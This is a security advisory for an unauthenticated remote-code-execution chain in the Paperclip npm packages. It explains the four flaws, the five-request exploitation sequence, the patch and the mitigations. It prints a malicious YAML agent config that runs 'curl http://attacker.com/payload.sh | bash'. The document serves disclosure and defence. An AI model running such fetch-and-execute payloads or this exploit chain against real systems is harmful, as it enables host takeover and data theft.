GHSA-68QG-G8MG-6PR7: Unauthenticated Remote Code Execution in Paperclip via Authorization Bypass Chain

The Paperclip platform, specifically the @paperclipai/server and paperclipai NPM packages, contains a critical vulnerability chain resulting in unauthenticated remote code execution (RCE). Tracked as GHSA-68QG-G8MG-6PR7, this flaw carries a maximum CVSS v3.1 score of 10.0. The vulnerability allows an external attacker to execute arbitrary system commands on the host operating system with the privileges of the Paperclip service account.

This exploitation path relies on the sequential abuse of four distinct architectural weaknesses. The chain begins with unrestricted account creation, proceeds through an authorization bypass in the CLI token generation process, exploits an improper access control check during company imports, and concludes with command injection via unvalidated agent configuration files. The complete exploit requires no prior privileges, user interaction, or specific system configuration other than default deployment settings.

The primary affected component is the API routing and authentication layer within the Paperclip server. Versions prior to 2026.410.0 fail to properly enforce administrative boundaries on the /api/companies/import endpoint and do not adequately sandbox the execution of process-based agents. This combination of structural flaws exposes the underlying operating system directly to network-connected attackers.

The root cause of GHSA-68QG-G8MG-6PR7 stems from a compound failure in access control, token issuance, and input validation. The first component of the chain is an insecure default configuration for user registration (CWE-453). The PAPERCLIP_AUTH_DISABLE_SIGN_UP environment variable defaults to false, and email verification is explicitly hardcoded to false within server/src/auth/better-auth.ts. This permits immediate, unverified account creation via the /api/auth/sign-up/email endpoint.

The second component involves an authorization bypass in the command-line interface (CLI) token generation flow (CWE-287). The challenge creation endpoint allows unauthenticated generation of auth challenges. The subsequent approval handler in server/src/routes/access.ts (lines 1638-1659) verifies that the approving entity is a valid board user. The application fails to enforce separation of duties, allowing the newly created unverified account to approve the challenge and obtain a persistent boardApiToken.

The third architectural flaw occurs within the company import functionality (CWE-285). Direct company creation typically requires administrative validation. The POST /api/companies/import endpoint completely omits the assertInstanceAdmin check when the import operation is executed with the new_company mode. This oversight allows any authenticated board user, including an attacker utilizing the previously generated API token, to instantiate new companies and define custom agents.

The final trigger is an unmitigated command injection vulnerability within the agent execution module (CWE-78). The imported company payload can include a .paperclip.yaml configuration file specifying a process adapter. This adapter invokes the Node.js spawn() function using a user-supplied command and args. The server executes these arguments without implementing sandboxing, character filtering, or path restrictions, translating the configuration data directly into native operating system processes.

The vulnerability manifests across multiple discrete files, with the most critical oversight located in the company import handler. In the vulnerable application state, the import endpoint accepts a JSON payload and processes it without validating the caller's administrative status. The handler checks for a valid session token but completely bypasses the assertInstanceAdmin function required for tenant-level modifications.

// Vulnerable Import Handler logic representation
export const importCompany = async (req: Request, res: Response) => {
  const user = await getBoardUser(req);
  if (!user) return res.status(401).send("Unauthorized");
 
  const importMode = req.body.mode;
  // Flaw: Missing assertInstanceAdmin(user) check for new_company mode
  if (importMode === 'new_company') {
    await createCompanyFromPayload(req.body.payload);
  }
};

The subsequent vulnerability resides in the agent adapter implementation. When a newly imported company contains a .paperclip.yaml file defining a process adapter, the server parses the command and args properties. These values pass directly to the underlying operating system when the application invokes the agent wakeup routine.

// Vulnerable Process Adapter execution
import { spawn } from 'child_process';
 
export const executeAdapter = (adapterConfig) => {
  if (adapterConfig.type === 'process') {
    // Flaw: Unvalidated user input passed directly to spawn()
    const child = spawn(adapterConfig.command, adapterConfig.args, {
      shell: true
    });
  }
};

The version 2026.410.0 patch addresses the import authorization bypass by enforcing the assertInstanceAdmin requirement on the /api/companies/import route regardless of the import mode. The patch modifies the default authentication behavior by securing the CLI token generation flow against self-approval by non-administrative accounts and disables open sign-ups by default.

Exploitation of GHSA-68QG-G8MG-6PR7 requires a sequence of five API interactions to achieve code execution. The attacker begins by submitting a POST request to /api/auth/sign-up/email with arbitrary credentials. The server responds with a successful registration message and immediately provisions the account due to the disabled email verification logic. The attacker authenticates via POST /api/auth/sign-in/email to obtain an active session cookie.

With a valid session established, the attacker initiates the token generation phase. A POST request is sent to /api/cli-auth/challenges to generate a new authentication challenge identifier. The attacker immediately follows this with a POST request to /api/cli-auth/challenges/<id>/approve, supplying their active session cookie. The application incorrectly validates the approval, returning a persistent boardApiToken bound to the newly created account.

The attacker utilizes this boardApiToken to invoke the vulnerable import endpoint. A POST request targets /api/companies/import with the mode set to new_company. The payload includes a malicious .paperclip.yaml file structure defining a custom agent utilizing the process adapter. This adapter passes arbitrary shell commands via the command and args parameters.

# Malicious .paperclip.yaml payload
agents:
  - id: "malicious_agent"
    adapter:
      type: "process"
      command: "bash"
      args: ["-c", "curl http://attacker.com/payload.sh | bash"]

The exploitation sequence concludes by triggering the agent execution. The attacker issues a POST request to /api/agents/<agent-id>/wakeup. The Paperclip server processes the wakeup request, parses the .paperclip.yaml configuration, and invokes the spawn() function. The arbitrary bash command executes under the security context of the Paperclip application process, establishing a reverse shell or executing the attacker's primary payload.

The successful execution of this vulnerability chain grants the attacker full host-level command execution. The injected commands run with the identical system privileges assigned to the Paperclip service account. In default deployments, this typically results in high-privileged access within the container or virtual machine hosting the application platform.

An attacker gains immediate read and write access to the underlying filesystem. This exposure allows for the extraction of sensitive environment variables, database connection strings, and application configuration files. The attacker can directly query the Paperclip database, accessing all tenant data, imported companies, user records, and internal system architectures managed by the platform.

The compromised server serves as an ideal staging point for lateral movement within the internal network. The attacker can map internal IP spaces, execute port scans, and pivot to adjacent services or databases that trust the Paperclip host. The ability to deploy persistent backdoors or integrate the host into an external command-and-control infrastructure significantly elevates the long-term risk profile of the affected environment.

The vulnerability carries a maximum CVSS v3.1 score of 10.0, reflecting its severe operational characteristics. The network attack vector, low attack complexity, lack of authentication requirements, and the complete compromise of confidentiality, integrity, and availability underscore the critical nature of this flaw. The changed scope metric accurately captures the transition from an application-layer vulnerability to total host operating system compromise.

The primary and most effective remediation strategy is upgrading the Paperclip packages to version 2026.410.0 or later. This update systematically breaks the exploit chain by enforcing proper administrative checks on the company import endpoints, securing the CLI authentication flow, and validating process adapter inputs. Administrators must verify the updated package installation across all environments utilizing @paperclipai/server or paperclipai.

For organizations unable to immediately deploy the patched version, a critical configuration workaround is available. Administrators must set the PAPERCLIP_AUTH_DISABLE_SIGN_UP environment variable to true. This configuration change explicitly prevents the unauthenticated creation of new accounts, effectively neutralizing the initial access vector required to initiate the exploit chain.

Security teams should implement stringent egress filtering on the network interfaces hosting the Paperclip application. Restricting the server's ability to initiate outbound connections limits the effectiveness of reverse shell payloads and remote resource downloads commonly used in post-exploitation phases. Egress rules should strictly whitelist only necessary external communication required for operational functionality.

Post-mitigation activities must include a comprehensive audit of all existing accounts, companies, and agent configurations. Administrators should review application logs for unauthorized activity directed at the /api/companies/import and /api/cli-auth/challenges endpoints. Any agents configured with process adapters executing shell binaries should be immediately disabled and investigated for malicious intent.